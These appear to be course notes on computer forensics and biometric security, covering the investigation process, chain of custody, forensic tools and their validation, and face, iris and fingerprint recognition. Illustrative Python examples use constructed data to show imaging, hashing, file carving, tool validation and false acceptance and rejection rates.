Csf-Unit 4


Computer Forensics and Investigations: Understanding Computer Forensics

INTRODUCTION
Computer Forensics is a scientific method of investigation and analysis in order to gather evidence
from digital devices or computer networks and components which is suitable for presentation in a court
of law or legal body. It involves performing a structured investigation while maintaining a documented
chain of evidence to find out exactly what happened on a computer and who was responsible for it.
TYPES
• Disk Forensics: It deals with extracting raw data from the primary or secondary storage of the
device by searching active, modified, or deleted files.
• Network Forensics: It is a sub-branch of computer forensics that involves monitoring and
analyzing computer network traffic.
• Database Forensics: It deals with the study and examination of databases and their related
metadata.
• Malware Forensics: It deals with the identification of suspicious code and the study of viruses,
worms, etc.
• Email Forensics: It deals with emails and their recovery and analysis, including deleted emails,
calendars, and contacts.
• Memory Forensics: It deals with collecting data from system memory (system registers, cache,
RAM) in raw form and then analyzing it for further investigation.
• Mobile Phone Forensics: It mainly deals with the examination and analysis of phones and
smartphones and helps to retrieve contacts, call logs, incoming and outgoing SMS, and other data
present on the device.

CHARACTERISTICS
• Identification: Identifying what evidence is present, where it is stored, and how it is stored (in
which format). Electronic devices can be personal computers, mobile phones, PDAs, etc.
• Preservation: Data is isolated, secured, and preserved. This includes prohibiting unauthorized
personnel from using the digital device so that the digital evidence is not tampered with, mistakenly
or purposely, and making a copy of the original evidence.
• Analysis: Forensic lab personnel reconstruct fragments of data and draw conclusions based on
the evidence.
• Documentation: A record of all the visible data is created. It helps in recreating and reviewing
the crime scene. All the findings from the investigation are documented.
• Presentation: All the documented findings are produced in a court of law for further
investigations.

PROCEDURE:
The procedure starts with identifying the devices used and collecting the preliminary evidence at the
crime scene. A court warrant is then obtained for the seizure of the evidence, and the evidence is
seized. The evidence is then transported to the forensics lab for further investigation; the documented
procedure for transporting the evidence from the crime scene to the lab is called the chain of custody.
The evidence is then copied for analysis and the original evidence is kept safe, because analysis is
always done on the copied evidence and never on the original.
The analysis is then performed on the copied evidence to look for suspicious activity, and the findings
are documented in a nontechnical tone. The documented findings are then presented in a court of law
for further investigations.
Some tools used for investigation:
Tools for Laptop or PC:
• COFEE – A suite of tools for Windows developed by Microsoft.
• The Coroner’s Toolkit – A suite of programs for Unix analysis.
• The Sleuth Kit – A library of tools for both Unix and Windows.
Tools for Memory:
• Volatility
• WindowsSCOPE
Tools for Mobile Devices:
• Micro Systemation XRY/XACT
APPLICATIONS
• Intellectual property theft
• Industrial espionage
• Employment disputes
• Fraud investigations
• Misuse of the Internet and email in the workplace
• Forgery-related matters
• Bankruptcy investigations
• Regulatory compliance issues
Advantages of Computer Forensics:
• Produces evidence for the court, which can lead to the punishment of the culprit.
• Helps companies gather important information about their computer systems or networks
that may have been compromised.
• Efficiently tracks down cyber criminals from anywhere in the world.
• Helps to protect the organization’s money and valuable time.
• Allows investigators to extract, process, and interpret factual evidence so that the
cybercriminal’s actions can be proved in court.
Disadvantages of Computer Forensics:
• Before digital evidence is accepted in court, it must be proved that it has not been tampered with.
• Producing and keeping electronic records safe is expensive.
• Legal practitioners must have extensive computer knowledge.
• Authentic and convincing evidence must be produced.
• If the tool used for digital forensics does not meet the specified standards, the evidence can be
rejected in a court of law.
• A lack of technical knowledge on the part of the investigating officer may mean the investigation
does not produce the desired result.

Preparing for Computer Investigations

The field of computer forensics investigation is growing, especially as law enforcement and legal
entities realize just how valuable information technology (IT) professionals are when it comes to
investigative procedures. With the advent of cyber crime, tracking malicious online activity has
become crucial for protecting private citizens, as well as preserving online operations in public safety,
national security, government and law enforcement. Tracking digital activity allows investigators to
connect cyber communications and digitally-stored information to physical evidence of criminal
activity; computer forensics also allows investigators to uncover premeditated criminal intent and may
aid in the prevention of future cyber crimes. For those working in the field, there are five critical steps
in computer forensics, all of which contribute to a thorough and revealing investigation.

• Policy and Procedure Development
Whether related to malicious cyber activity, criminal conspiracy or the intent to commit a crime, digital
evidence can be delicate and highly sensitive. For this reason, it is critical to establish and follow strict
guidelines and procedures for activities related to computer forensic investigations. Such procedures
can include detailed instructions about when computer forensics investigators are authorized to recover
potential digital evidence, how to properly prepare systems for evidence retrieval, where to store any
retrieved evidence, and how to document these activities to help ensure the authenticity of the data.
Law enforcement agencies are becoming increasingly reliant on designated IT departments, which are
staffed by seasoned cyber security experts who determine proper investigative protocols and develop
rigorous training programs to ensure best practices are followed in a responsible manner. In addition to
establishing strict procedures for forensic processes, cybersecurity divisions must also set forth rules of
governance for all other digital activity within an organization. This is essential to protecting the data
infrastructure of law enforcement agencies as well as other organizations.
An integral part of the investigative policies and procedures for law enforcement organizations that
utilize computer forensic departments is the codification of a set of explicitly-stated actions regarding
what constitutes evidence, where to look for said evidence and how to handle it once it has been
retrieved. Prior to any digital investigation, proper steps must be taken to determine the details of the
case at hand, as well as to understand all permissible investigative actions in relation to the case; this
involves reading case briefs, understanding warrants and authorizations, and obtaining any permissions
needed prior to pursuing the case.

• Evidence Assessment
A key component of the investigative process involves the assessment of potential evidence in a cyber
crime. Central to the effective processing of evidence is a clear understanding of the details of the case
at hand and thus, the classification of cyber crime in question. For instance, if an agency seeks to prove
that an individual has committed crimes related to identity theft, computer forensics investigators use
sophisticated methods to sift through hard drives, email accounts, social networking sites, and other
digital archives to retrieve and assess any information that can serve as viable evidence of the crime.
This is, of course, true for other crimes, such as engaging in online criminal behavior like posting fake
products on eBay or Craigslist intended to lure victims into sharing credit card information. Prior to
conducting an investigation, the investigator must define the types of evidence sought (including
specific platforms and data formats) and have a clear understanding of how to preserve pertinent data.
The investigator must then determine the source and integrity of such data before entering it into
evidence.

• Evidence Acquisition
Perhaps the most critical facet of successful computer forensic investigation is a rigorous, detailed plan
for acquiring evidence. Extensive documentation is needed prior to, during, and after the acquisition
process; detailed information must be recorded and preserved, including all hardware and software
specifications, any systems used in the investigation process, and the systems being investigated. This
step is where policies related to preserving the integrity of potential evidence are most applicable.
General guidelines for preserving evidence include the physical removal of storage devices, using
controlled boot discs to retrieve sensitive data and ensure functionality, and taking appropriate steps to
copy and transfer evidence to the investigator’s system.
Acquiring evidence must be accomplished in a manner both deliberate and legal. Being able to
document and authenticate the chain of evidence is crucial when pursuing a court case, and this is
especially true for computer forensics given the complexity of most cybersecurity cases.

• Evidence Examination
In order to effectively investigate potential evidence, procedures must be in place for retrieving,
copying, and storing evidence within appropriate databases. Investigators typically examine data from
designated archives, using a variety of methods and approaches to analyze information; these could
include utilizing analysis software to search massive archives of data for specific keywords or file
types, as well as procedures for retrieving files that have been recently deleted. Data tagged with times
and dates is particularly useful to investigators, as are suspicious files or programs that have been
encrypted or intentionally hidden.
Analyzing file names is also useful, as it can help determine when and where specific data was created,
downloaded, or uploaded and can help investigators connect files on storage devices to online data
transfers (such as cloud-based storage, email, or other Internet communications). This can also work in
reverse order, as file names usually indicate the directory that houses them. Files located online or on
other systems often point to the specific server and computer from which they were uploaded,
providing investigators with clues as to where the system is located; matching online filenames to a
directory on a suspect’s hard drive is one way of verifying digital evidence. At this stage, computer
forensic investigators work in close collaboration with criminal investigators, lawyers, and other
qualified personnel to ensure a thorough understanding of the nuances of the case, permissible
investigative actions, and what types of information can serve as evidence.

• Documenting and Reporting
In addition to fully documenting information related to hardware and software specs, computer
forensic investigators must keep an accurate record of all activity related to the investigation, including
all methods used for testing system functionality and retrieving, copying, and storing data, as well as
all actions taken to acquire, examine and assess evidence. Not only does this demonstrate how the
integrity of user data has been preserved, but it also ensures proper policies and procedures have been
adhered to by all parties. As the purpose of the entire process is to acquire data that can be presented as
evidence in a court of law, an investigator’s failure to accurately document his or her process could
compromise the validity of that evidence and ultimately, the case itself.
For computer forensic investigators, all actions related to a particular case should be accounted for in a
digital format and saved in properly designated archives. This helps ensure the authenticity of any
findings by allowing these cybersecurity experts to show exactly when, where, and how evidence was
recovered. It also allows experts to confirm the validity of evidence by matching the investigator’s
digitally recorded documentation to dates and times when this data was accessed by potential suspects
via external sources.

CURRENT COMPUTER FORENSIC TOOLS

Types of Computer Forensics Tools


Computer forensics tools are divided into two major categories: hardware and software. Each category
has additional subcategories discussed in more depth later in this chapter. The following sections
outline basic features required and expected of most computer forensics tools.

Hardware Forensics Tools range from simple, single purpose components to complete computer
systems and servers. Single-purpose components can be devices, such as the ACARD AEC-7720WP
Ultra Wide SCSI-to-IDE Bridge, which is designed to write-block an IDE drive connected to a SCSI
cable.
Some examples of complete systems are Digital Intelligence F.R.E.D. systems, DIBS Advanced
Forensic Workstations, and Forensic Computers Forensic Examination Stations and portable units.
Software Forensics Tools are grouped into command-line applications and GUI applications. Some
tools are specialized to perform one task, such as SafeBack, a command-line disk acquisition tool from
New Technologies, Inc. (NTI). Other tools are designed to perform many different tasks. For example,
Technology Pathways ProDiscover, X-Ways Forensics, Guidance Software EnCase, and AccessData
FTK are GUI tools designed to perform most computer forensics acquisition and analysis functions.
Software forensics tools are commonly used to copy data from a suspect’s drive to an image file. Many
GUI acquisition tools can read all structures in an image file as though the image were the original
drive. Many analysis tools, such as ProDiscover, EnCase, FTK, X-Ways Forensics, ILook, and others,
have the capability to analyze image files. In Chapter 4, you learned how some of these tools are used
to acquire data from suspects’ drives.
Tasks Performed by Computer Forensics Tools
All computer forensics tools, both hardware and software, perform specific functions. These functions
are grouped into five major categories, each with sub functions for further refining data analysis and
recovery:
• Acquisition
• Validation and discrimination
• Extraction
• Reconstruction
• Reporting

In the following sections, you learn how these five functions and associated sub functions apply to
computing investigations.
Acquisition, the first task in computer forensics investigations, is making a copy of the original drive.
As described in Chapter 4, this procedure preserves the original drive to make sure it doesn’t become
corrupt and damage the digital evidence. Sub functions in the acquisition category include the
following:
• Physical data copy
• Logical data copy
• Data acquisition format
• Command-line acquisition
• GUI acquisition
• Remote acquisition
• Verification

Some computer forensics software suites, such as AccessData FTK and EnCase, provide separate
tools for acquiring an image. However, some investigators opt to use hardware devices, such as the
Logicube Talon, VOOM HardCopy 3, or Image MASSter Solo III Forensic unit from Intelligent
Computer Solutions, Inc., for acquiring an image. These hardware devices have their own built-in
software for data acquisition. No other device or program is needed to make a duplicate drive;
however, you still need forensics software to analyze the data.
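The acquisition sub functions listed above (physical copy, verification, and the documentation that supports the chain of custody) can be shown in a few dozen lines. The following Python script is an added example written for these notes; it is not code from any of the tools named here. It uses a constructed byte string standing in for a suspect drive, makes a sector-for-sector copy, hashes source and image before and after the copy, and emits a custody record. The evidence-id scheme, the examiner name and the record fields are assumptions chosen for the example.

```python
import hashlib
import json
from datetime import datetime, timezone

SECTOR_SIZE = 512

# Constructed stand-in for a suspect drive (three sectors). A real acquisition
# reads the block device through a hardware or software write blocker.
SUSPECT_DRIVE = (b"BOOT SECTOR (constructed)".ljust(SECTOR_SIZE, b"\x00")
                 + b"case notes (constructed)".ljust(SECTOR_SIZE, b"\x00")
                 + b"\xff" * SECTOR_SIZE)


def sha256_of(data, chunk=SECTOR_SIZE):
    """Hash data sector by sector; streaming keeps memory use flat on real drives."""
    h = hashlib.sha256()
    view = memoryview(data)
    for offset in range(0, len(view), chunk):
        h.update(view[offset:offset + chunk])
    return h.hexdigest()


def physical_copy(source):
    """Sector-for-sector copy (a physical acquisition), including unused sectors."""
    image = bytearray()
    for offset in range(0, len(source), SECTOR_SIZE):
        image += source[offset:offset + SECTOR_SIZE]
    return bytes(image)


def verify_image(source_hash, image):
    """Verification sub function: the image hash must equal the source hash."""
    return sha256_of(image) == source_hash


def acquire_and_verify(source, examiner, evidence_id):
    """Image the source, verify the copy, and produce a custody record.

    Returns (verified, record, image). If verified is False the image must not
    be used for analysis; the record documents the mismatch either way.
    """
    source_hash = sha256_of(source)          # hash taken before copying
    image = physical_copy(source)
    verified = verify_image(source_hash, image)
    record = {
        "evidence_id": evidence_id,          # hypothetical labelling scheme
        "examiner": examiner,
        "acquired_at_utc": datetime.now(timezone.utc).isoformat(),
        "method": "physical sector copy",
        "bytes_copied": len(image),
        "sha256_source": source_hash,
        "sha256_image": sha256_of(image),
        "verified": verified,
    }
    return verified, record, image


if __name__ == "__main__":
    ok, rec, img = acquire_and_verify(SUSPECT_DRIVE, "J. Doe", "EXHIBIT-001")
    print(json.dumps(rec, indent=2))
    print("image verified" if ok else "HASH MISMATCH - do not analyse this image")
```

The record is what later goes into the case file: anyone re-hashing the image at trial can compare against `sha256_source` to show the copy was not altered after acquisition.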

Evaluating Computer Forensics Tools


Validation and Discrimination
Two issues in dealing with computer evidence are critical. First is ensuring the integrity of data being
copied—the validation process. Second is the discrimination of data, which involves sorting and
searching through all investigation data. The process of validating data is what allows discrimination
of data. Many forensics software vendors offer three methods for discriminating data values. These are
the sub functions of the validation and discrimination function:
• Hashing
• Filtering
• Analyzing file headers

Validating data is done by obtaining hash values. As a standard feature, most forensics tools and many
disk editors have one or more types of data hashing. How data hashing is used depends on the
investigation, but using a hashing algorithm on the entire suspect drive and all its files is a good idea.
This method produces a unique hexadecimal value for data, used to make sure the original data hasn’t
changed.
This unique value has other potential uses. For example, in the corporate environment, you could
create a known good hash value list of a fresh installation of an OS, all applications, and all known
good images and documents (spreadsheets, text files, and so on). With this information, an investigator
could ignore all files on this known good list and focus on other files on the disk that aren’t on this
list. This process is known as filtering. Filtering can also be used to find data for evidence in criminal
investigations or to build a case for terminating an employee.
The primary purpose of data discrimination is to separate known good data from suspicious data. Good
data consists of known files, such as OS files and common programs (Microsoft Word, for example).
Several computer forensics programs can integrate known good file hash sets, such as the ones from
the NSRL, and compare them to file hashes from a suspect drive to see whether they match. With this
process, you can eliminate large amounts of data quickly so that you can focus your evidence analysis.
You can also begin building your own hash sets.
Another feature to consider for hashing functions is hashing and comparing sectors of data. This
feature is useful for identifying fragments of data in slack and free disk space that might be partially
overwritten.
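The filtering and sector-hashing ideas in the preceding paragraphs are easy to try out in code. The Python below is an added example for these notes, not part of any forensics product or of the NSRL: the "known good" hash set is built from a constructed miniature installation rather than real NSRL data, and the suspect files and free-space bytes are likewise constructed. It shows that a known file under a misleading name is still filtered out because the hash, not the name, is compared, and that a single intact sector of a file of interest can be located in free space even when a neighbouring sector has been partially overwritten.

```python
import hashlib

SECTOR = 512


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Constructed "fresh installation": the hash set is built from these bytes,
# standing in for a reference set such as the NSRL's (not real NSRL data).
TRUSTED_INSTALL = {
    "notepad.exe": b"MZ\x90\x00 constructed notepad binary",
    "kernel32.dll": b"MZ\x90\x00 constructed kernel32 library",
    "readme.txt": b"constructed vendor readme",
}

# Constructed suspect drive: one untouched known file, one known file under a
# misleading name, and one file that appears nowhere on the known-good list.
SUSPECT_FILES = {
    "notepad.exe": b"MZ\x90\x00 constructed notepad binary",
    "holiday.jpg": b"MZ\x90\x00 constructed kernel32 library",   # renamed copy
    "plan.txt": b"constructed user document of interest",
}


def build_known_good_set(files):
    """Hash every file of the trusted installation into a lookup set."""
    return {sha256_hex(content) for content in files.values()}


def filter_unknown(files, known_good):
    """Filtering: drop files whose hash is on the known-good list.

    The comparison is on content, so renaming a known file does not hide it,
    and a single changed byte in a 'known' file makes it reappear here.
    """
    return {name: content for name, content in files.items()
            if sha256_hex(content) not in known_good}


def sector_hash_table(data, sector=SECTOR):
    """Hash each sector of a file of interest, keyed by hash -> file offset."""
    return {sha256_hex(data[i:i + sector]): i for i in range(0, len(data), sector)}


def find_fragments(free_space, table, sector=SECTOR):
    """Sector hashing: report (free-space offset, file offset) for every sector
    of the file that survives intact in unallocated space."""
    hits = []
    for offset in range(0, len(free_space), sector):
        h = sha256_hex(free_space[offset:offset + sector])
        if h in table:
            hits.append((offset, table[h]))
    return hits


# Constructed file of interest (three full sectors) and constructed free space
# in which sector 1 survives intact and sector 0 was partially overwritten.
DOC = (b"confidential memo, sector 0".ljust(SECTOR, b"A")
       + b"sector 1 of memo".ljust(SECTOR, b"B")
       + b"sector 2 of memo".ljust(SECTOR, b"C"))
FREE_SPACE = (b"\x00" * SECTOR * 2
              + DOC[SECTOR:2 * SECTOR]                                # intact sector 1
              + b"OVERWRITTEN".ljust(64, b"\x00") + DOC[64:SECTOR]    # damaged sector 0
              + b"\x00" * SECTOR)

if __name__ == "__main__":
    known = build_known_good_set(TRUSTED_INSTALL)
    print("files left to examine:", sorted(filter_unknown(SUSPECT_FILES, known)))
    print("fragments in free space:", find_fragments(FREE_SPACE, sector_hash_table(DOC)))
```

The partially overwritten sector is the caveat the text raises: sector hashing only matches sectors that are byte-for-byte intact and sector-aligned, so a hit proves presence but a miss does not prove absence.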
An additional method of discriminating data is analyzing and verifying header values for known file
types. Similar to the hash values of known files, many computer forensics programs include a list of
common header values. With this information, you can see whether a file extension is incorrect for
the file type. Renaming file extensions is a common way to try to hide data, and you could miss
pertinent data if you don’t check file headers.

4.1.2 Extraction
The extraction function is the recovery task in a computing investigation and is the most challenging of
all tasks to master.
Recovering data is the first step in analyzing an investigation’s data. The following sub functions of
extraction are used in investigations:
• Data viewing
• Keyword searching
• Decompressing
• Carving
• Decrypting
• Bookmarking

Many computer forensics tools include a data-viewing mechanism for digital evidence. How data is
viewed depends on the tool. Tools such as ProDiscover, X-Ways Forensics, FTK, EnCase, SMART,
ILook, and others offer several ways to view data, including logical drive structures, such as folders
and files. These tools also display allocated file data and unallocated disk areas with special file and
disk viewers. Being able to view this data in its normal form makes analyzing and collecting clues for
the investigation easier.
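Two of the sub functions named in this part of the notes, header analysis (from the validation and discrimination section) and carving (from the extraction list), share the same ingredient: a table of known header and footer bytes. The Python below is an added example for these notes, not the signature database of any forensics tool; the magic and footer bytes are the published ones for those formats, while the sample JPEG, PDF and "unallocated space" bytes are constructed. `extension_mismatch` flags a file whose extension does not fit its header, and `carve` pulls header-to-footer runs out of raw bytes.

```python
# Header signatures ("magic numbers") for a few common file types. The magic
# and footer bytes are the real published ones; the table is this example's
# own, not a forensic tool's signature database.
SIGNATURES = {
    "jpeg": {"magic": b"\xff\xd8\xff", "ext": {"jpg", "jpeg"}, "footer": b"\xff\xd9"},
    "png":  {"magic": b"\x89PNG\r\n\x1a\n", "ext": {"png"}, "footer": b"IEND\xaeB\x60\x82"},
    "pdf":  {"magic": b"%PDF-", "ext": {"pdf"}, "footer": b"%%EOF"},
    "zip":  {"magic": b"PK\x03\x04", "ext": {"zip", "docx", "xlsx"}, "footer": None},
}


def identify_by_header(data):
    """Return the type name whose magic bytes open the data, or None."""
    for name, sig in SIGNATURES.items():
        if data.startswith(sig["magic"]):
            return name
    return None


def extension_mismatch(filename, data):
    """Header analysis: (detected type, True if the extension does not fit it)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    detected = identify_by_header(data)
    if detected is None:
        return None, False          # unknown header: nothing to compare against
    return detected, ext not in SIGNATURES[detected]["ext"]


def carve(raw, max_size=10_000_000):
    """Carving: find header/footer pairs in raw bytes such as unallocated space.

    Returns [(type, offset, bytes)] sorted by offset. Types without a fixed
    footer (zip) are skipped; they need structure parsing, which is not shown.
    """
    found = []
    for name, sig in SIGNATURES.items():
        if sig["footer"] is None:
            continue
        start = raw.find(sig["magic"])
        while start != -1:
            end = raw.find(sig["footer"], start + len(sig["magic"]))
            if end == -1:
                break               # header without footer: truncated file
            end += len(sig["footer"])
            if end - start <= max_size:
                found.append((name, start, raw[start:end]))
            start = raw.find(sig["magic"], end)
    return sorted(found, key=lambda hit: hit[1])


# Constructed sample data: a fake JPEG and a fake PDF with valid magic/footer
# bytes embedded in filler standing in for unallocated disk space.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"JFIF constructed picture data" + b"\xff\xd9"
FAKE_PDF = b"%PDF-1.4 constructed document\n%%EOF"
UNALLOCATED = b"\x00" * 40 + FAKE_JPEG + b"junk!" * 7 + FAKE_PDF + b"\x00" * 16

if __name__ == "__main__":
    print(extension_mismatch("holiday.txt", FAKE_JPEG))   # ('jpeg', True)
    print(extension_mismatch("report.pdf", FAKE_PDF))     # ('pdf', False)
    for kind, offset, blob in carve(UNALLOCATED):
        print(f"{kind} at offset {offset}, {len(blob)} bytes")
```

Header/footer carving is the simplest form; fragmented files and formats without a fixed footer need the format's own structure parsed, which is why real carvers carry per-format parsers rather than only a signature list.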
4.2 Computer Forensics Software Tools
Whether you use a suite of tools or a task-specific tool, you have the option of selecting one that
enables you to analyze digital evidence through the command line or in a GUI. The following sections
explore some options for command-line and GUI tools in both Windows and UNIX/Linux.
Command-Line Forensics Tools
Computers used several OSs before MS-DOS dominated the market. During this time, computer
forensics wasn’t a major concern. After people started using PCs, however, they figured out how to
use them for illegal and destructive purposes and to commit crimes and civil infractions.
Software developers began releasing computer forensics tools to help private- and public-sector
investigators examine PCs. The first tools that analyzed and extracted data from floppy disks and hard
disks were MS-DOS tools for IBM PC file systems.
One of the first MS-DOS tools used for computer investigations was Norton Disk Edit. This tool used
manual processes that required investigators to spend considerable time on a typical 500 MB drive.
Eventually, programs designed for computer forensics were developed for DOS, Windows, Apple,
NetWare, and UNIX systems. Some of these early programs could extract data from slack and free disk
space; others were capable only of retrieving deleted files. Current programs are more robust and can
search for specific words or characters, import a keyword list to search, calculate hash values, recover
deleted items, conduct physical and logical analyses, and more.
One advantage of using command-line tools for an investigation is that they require few system
resources because they’re designed to run in minimal configurations. In fact, most tools fit on bootable
media (floppy disk, USB drive, CD, or DVD). Conducting an initial inquiry or a complete
investigation with bootable media can save time and effort. Most tools also produce a text report small
enough to fit on a floppy disk.
Forensic Workstations
Many computer vendors offer a wide range of forensic workstations that you can tailor to meet your
investigation needs. The more diverse your investigation environment, the more options you need.
In general, forensic workstations can be divided into the following categories:
• Stationary workstation—A tower with several bays and many peripheral devices
• Portable workstation—A laptop computer with a built-in LCD monitor and almost as many bays
and peripherals as a stationary workstation
• Lightweight workstation—Usually a laptop computer built into a carrying case with a small
selection of peripheral options
When considering options to add to a basic workstation, keep in mind that PCs have limitations on
how many peripherals they can handle. The more peripherals you add, the more potential problems you
might have, especially if you’re using an older version of Windows. You must learn to balance what
you actually need with what your system can handle.
4.3 Validating and Testing Forensics Software
Now that you have selected some tools to use, you need to make sure the evidence you recover
and analyze can be admitted in court. To do this, you must test and validate your software. The
following sections discuss validation tools available at the time of this writing and how to
develop your own validation protocols.
Using National Institute of Standards and Technology (NIST) Tools
The National Institute of Standards and Technology publishes articles, provides tools, and creates
procedures for testing and validating computer forensics software. Software should be verified to
improve evidence admissibility in judicial proceedings. NIST sponsors the Computer Forensics
Tool Testing (CFTT) project to manage research on computer forensics tools.
• Establish categories for computer forensics tools—Group computer forensics software according
to categories, such as forensics tools designed to retrieve and trace e-mail.
• Identify computer forensics category requirements—For each category, describe the technical
features or functions a forensics tool must have.
• Develop test assertions—Based on the requirements, create tests that prove or disprove the tool’s
capability to meet the requirements.
• Identify test cases—Find or create types of cases to investigate with the forensics tool, and
identify information to retrieve from a sample drive or other media. For example, use the image
of a closed case file created with a trusted forensics tool to test a new tool in the same category
and see whether it produces the same results.
• Establish a test method—Considering the tool’s purpose and design, specify how to test it.
• Report test results—Describe the test results in a report that complies with ISO 17025, which
requires accurate, clear, unambiguous, and objective test reports.
Another standards document, ISO 5725, demands accuracy for all aspects of the testing process, so
results must be repeatable and reproducible. "Repeatable results" means that if you work in the same lab
on the same machine, you generate the same results. "Reproducible results" means that if you’re in a
different lab working on a different machine, the tool still retrieves the same information.
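The CFTT steps above (category requirements, test assertions, a reference test case, a test method, and repeatable results) can be exercised on a tiny scale. The following Python is an added example written for these notes; it is not CFTT material or any vendor's test suite. The "closed case" image is constructed so that every keyword position is known and acts as the answer key; two hypothetical keyword-search tools, `search_whole` and `search_chunked`, are then validated against it. The second one has a classic defect, searching fixed chunks without overlap, so the assertions disprove its claim to find every occurrence.

```python
def build_reference_image():
    """Constructed reference image standing in for the image of a closed case:
    every keyword placement is known, so it serves as the answer key."""
    buf = bytearray(2048)
    placements = {100: b"wire transfer", 505: b"Wire Transfer",
                  1500: b"WIRE TRANSFER", 1700: b"invoice"}
    for offset, word in placements.items():
        buf[offset:offset + len(word)] = word
    return bytes(buf)


REFERENCE_IMAGE = build_reference_image()

# Test assertions derived from the requirement "find every case-insensitive
# occurrence, report its byte offset, and report nothing that is not there".
EXPECTED = {
    b"wire transfer": [100, 505, 1500],
    b"invoice": [1700],
    b"bitcoin": [],
}


def search_whole(image, keyword):
    """Hypothetical tool under test A: search the whole image in one pass."""
    hay, needle = image.lower(), keyword.lower()
    hits, pos = [], hay.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = hay.find(needle, pos + 1)
    return hits


def search_chunked(image, keyword, chunk=512):
    """Hypothetical tool under test B: searches fixed chunks without overlap,
    so a keyword that straddles a chunk boundary is missed."""
    needle = keyword.lower()
    hits = []
    for base in range(0, len(image), chunk):
        part = image[base:base + chunk].lower()
        pos = part.find(needle)
        while pos != -1:
            hits.append(base + pos)
            pos = part.find(needle, pos + 1)
    return hits


def validate_tool(tool, image, expected, runs=2):
    """Test method: run each assertion and check repeatability across runs.

    Returns (passed, report); report lists expected vs found per keyword so
    the result can be written up in the test report.
    """
    report = {}
    for keyword, want in expected.items():
        results = [tool(image, keyword) for _ in range(runs)]
        repeatable = all(r == results[0] for r in results)
        report[keyword] = {"expected": want, "found": results[0],
                           "pass": repeatable and results[0] == want}
    return all(entry["pass"] for entry in report.values()), report


if __name__ == "__main__":
    for name, tool in (("whole-image search", search_whole),
                       ("chunked search", search_chunked)):
        passed, report = validate_tool(tool, REFERENCE_IMAGE, EXPECTED)
        print(name, "PASS" if passed else "FAIL")
        for keyword, entry in report.items():
            if not entry["pass"]:
                print("  ", keyword, "expected", entry["expected"], "found", entry["found"])
```

The boundary miss at offset 505 is exactly the kind of finding a validation protocol exists to surface: the tool returns plausible results on most input and only fails on data placed where its internal buffering breaks, which a reference image with known answers catches and an unvalidated run would not.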

Facial recognition
A facial recognition system analyses the shape and position of different parts of the face to
determine a match. Surface features, such as the skin, are also sometimes taken into account.
Facial recognition for biometric security purposes is an offshoot of face detection technology,
which is used to identify faces in complex images in which a number of faces may be present.
This technology has developed rapidly in recent years and is therefore an excellent candidate as
biometric security if a system is needed for remote recognition. Another plus is that the
technology allows ‘negative identification’, or the exclusion of faces, making it a good deal
easier to scan a crowd for suspicious individuals.
However, facial recognition also has a number of significant drawbacks. For example, the
technology focuses mainly on the face itself, i.e. from the hairline down. As a result, a person
usually has to be looking straight at the camera to make recognition possible. And even though
the technology is still developing at a rapid pace, the level of security it currently offers does not
yet rival that of iris scanning or vein pattern recognition.

Iris recognition

When an iris scan is performed a scanner reads out the unique characteristics of an iris, which are
then converted into an encrypted (bar)code. Iris scanning is known to be an excellent biometric
security technique, especially if it is performed using infrared light.
However, one problem frequently encountered when the technology is introduced is resistance
from users. Quite a few people find having their eyes scanned a rather unpleasant experience.
You also have to adopt a certain position so the scanner can read your iris, which can cause
discomfort. Hygiene is another frequently cited drawback, as many systems require users to
place their chin on a chin rest that has been used by countless people before them.
Lastly, it is important to bear in mind that although iris scanning offers a high level of biometric
security, this may come at the expense of speed. Incidentally, systems have recently been
developed that can read a person’s iris from a (relatively short) distance.

Fingerprint recognition

An identification system based on fingerprint recognition looks for specific characteristics in the
line pattern on the surface of the finger. The bifurcations, ridge endings and islands that make up
this line pattern are stored in the form of an image.
The disadvantage of capturing an image of an external characteristic is that this image can be
replicated – even if it is stored in encoded form. An image is still an image, after all, and can
therefore be compared. In principle, you can then generate the same code. Fingerprints can
already be spoofed* using relatively accessible technology. Another, by no means insignificant,
point to consider is that a finger presented for recognition does not necessarily still need to be
attached to a body...
In addition, some line patterns are so similar that in practice this can result in a high false
acceptance rate.** Fingerprints can also wear away as you get older, if you do a lot of DIY or a
particular kind of work, for example. As a result, some people may find that their fingerprints
cannot be recognised (false rejection**) or even recorded. There is even
a hereditary disorder that results in people being born without fingerprints!
On the other hand, fingerprint identification is already familiar to much of the public and is
therefore accepted by a large number of users to use as biometric security. The technology is also
relatively cheap and easy to use. It should be noted, however, that quality can vary significantly
from one fingerprint recognition system to another, with considerable divergence between
systems in terms of false acceptance and false rejection rates.
* Biometric spoofing refers to the presentation of a falsified biometric characteristic with the
aim of being identified as another person. This may involve using a replicated fingerprint or a
contact lens with a falsified iris pattern. The risk of spoofing mainly applies to forms of
biometric security based on superficial external characteristics.
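The false acceptance and false rejection rates discussed for fingerprint recognition are two sides of one decision threshold. The Python below is an added example for these notes, not code from any biometric system: the genuine and impostor match scores are constructed, and the matcher that would produce them is hypothetical. It computes FAR and FRR at a threshold, tabulates the trade-off, finds the threshold where the two rates cross, and simulates worn ridges lowering genuine scores so that FRR rises at an unchanged threshold.

```python
# Constructed similarity scores (0..1) from a hypothetical fingerprint matcher.
GENUINE = [0.91, 0.88, 0.95, 0.62, 0.79, 0.85, 0.93, 0.58, 0.90, 0.87]   # same finger
IMPOSTOR = [0.21, 0.35, 0.66, 0.12, 0.40, 0.71, 0.30, 0.25, 0.18, 0.44]  # other people


def far(impostor, threshold):
    """False acceptance rate: impostor attempts scoring at or above threshold."""
    return sum(1 for s in impostor if s >= threshold) / len(impostor)


def frr(genuine, threshold):
    """False rejection rate: genuine attempts scoring below threshold."""
    return sum(1 for s in genuine if s < threshold) / len(genuine)


def tradeoff(genuine, impostor, thresholds):
    """(threshold, FAR, FRR) rows: raising the threshold lowers FAR, raises FRR."""
    return [(t, far(impostor, t), frr(genuine, t)) for t in thresholds]


def equal_error_threshold(genuine, impostor, steps=100):
    """Threshold at which FAR and FRR are closest (the equal error rate point)."""
    candidates = [i / steps for i in range(steps + 1)]
    return min(candidates, key=lambda t: abs(far(impostor, t) - frr(genuine, t)))


def worn_fingers(genuine, loss):
    """Simulate worn ridges: genuine scores fall, so FRR rises at a fixed threshold."""
    return [max(0.0, s - loss) for s in genuine]


if __name__ == "__main__":
    for t, a, r in tradeoff(GENUINE, IMPOSTOR, [0.5, 0.6, 0.7, 0.8, 0.9]):
        print(f"threshold {t:.2f}: FAR {a:.1f}  FRR {r:.1f}")
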